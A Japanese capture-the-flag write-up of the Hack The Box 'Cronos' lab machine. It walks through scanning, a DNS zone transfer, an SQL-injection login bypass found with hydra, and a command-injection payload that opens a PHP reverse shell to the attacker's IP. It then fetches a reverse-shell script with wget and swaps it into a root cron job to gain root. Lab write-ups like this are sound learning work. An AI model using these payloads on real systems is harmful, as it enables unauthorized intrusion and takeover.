はじめに
筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
machine について
難易度は medium です
nmap
kali@kali:~$ nmap -sC -sV 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-02 05:26 EDT
Nmap scan report for 10.10.10.13
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.43 seconds
80 番
Apache のデフォルトページが出てきます
cronos.htb を/etc/hosts に追加してアクセスすることで以下のページが出ます
gobuster
kali@kali:~$ gobuster dir -u http://cronos.htb/ -w /usr/share/dirb/wordlists/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://cronos.htb/
[+] Threads: 40
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/07/03 04:39:42 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/css (Status: 301)
/favicon.ico (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/07/03 04:47:27 Finished
===============================================================
subdomain enumration
kali@kali:~$ host -l cronos.htb 10.10.10.13
Using domain server:
Name: 10.10.10.13
Address: 10.10.10.13#53
Aliases:
cronos.htb name server ns1.cronos.htb.
cronos.htb has address 10.10.10.13
admin.cronos.htb has address 10.10.10.13
ns1.cronos.htb has address 10.10.10.13
www.cronos.htb has address 10.10.10.13
admin.cronos.htb のみが別ページが出てきます
gobuster(admin)
kali@kali:~$ gobuster dir -u http://admin.cronos.htb/ -w /usr/share/dirb/wordlists/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://admin.cronos.htb/
[+] Threads: 40
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/07/03 13:22:35 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/config.php (Status: 200)
/index.php (Status: 200)
/logout.php (Status: 302)
/server-status (Status: 403)
/session.php (Status: 302)
/welcome.php (Status: 302)
===============================================================
2020/07/03 13:29:56 Finished
===============================================================
hydra で brute force で login を試みる
kali@kali:~$ hydra -L /usr/share/wfuzz/wordlist/Injections/SQL.txt -p pass admin.cronos.htb http-post-form "/index.php:username=^USER^&password=^PASS^:Your Login Name or Password is invalid" -f
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-03 13:52:56
[DATA] max 16 tasks per 1 server, overall 16 tasks, 125 login tries (l:125/p:1), ~8 tries per task
[DATA] attacking http-post-form://admin.cronos.htb:80/index.php:username=^USER^&password=^PASS^:Your Login Name or Password is invalid
[80][http-post-form] host: admin.cronos.htb login: ' or 0=0 # password: pass
[STATUS] attack finished for admin.cronos.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-07-03 13:52:59
SQLi が通りそうです、
login 成功しました
RCE
明らかに RCE が通りそうな匂いがしているので以下を入力して Execute!します
10.10.14.48;php -r '$sock=fsockopen("10.10.14.48",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
kali@kali:~$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.13] 45382
/bin/sh: 0: can't access tty; job control turned off
$
案の定 shell が取れます
PE
crontab を見てみると
$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#
/var/www/laravel/artisan を定期実行しています、なので/var/www/laravel/artisan をphp-reverse-shell.phpに置き換えます
$ cd /var/www/laravel
cd /var/www/laravel
$ wget http://10.10.14.48:8000/php-reverse-shell.php
wget http://10.10.14.48:8000/php-reverse-shell.php
--2020-07-03 21:22:58-- http://10.10.14.48:8000/php-reverse-shell.php
Connecting to 10.10.14.48:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5493 (5.4K) [application/octet-stream]
Saving to: 'php-reverse-shell.php'
php-reverse-shell.p 100%[===================>] 5.36K --.-KB/s in 0s
2020-07-03 21:22:58 (598 MB/s) - 'php-reverse-shell.php' saved [5493/5493]
$ mv php-reverse-shell.php artisan
mv php-reverse-shell.php artisan
host から wget を使用して upload しています
この状態で crontab が実行されるのを待っていると…
kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.13] 55106
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
21:24:02 up 10:02, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
root が取れました
終わりに
medium にしてはかなり簡単なマシンでした。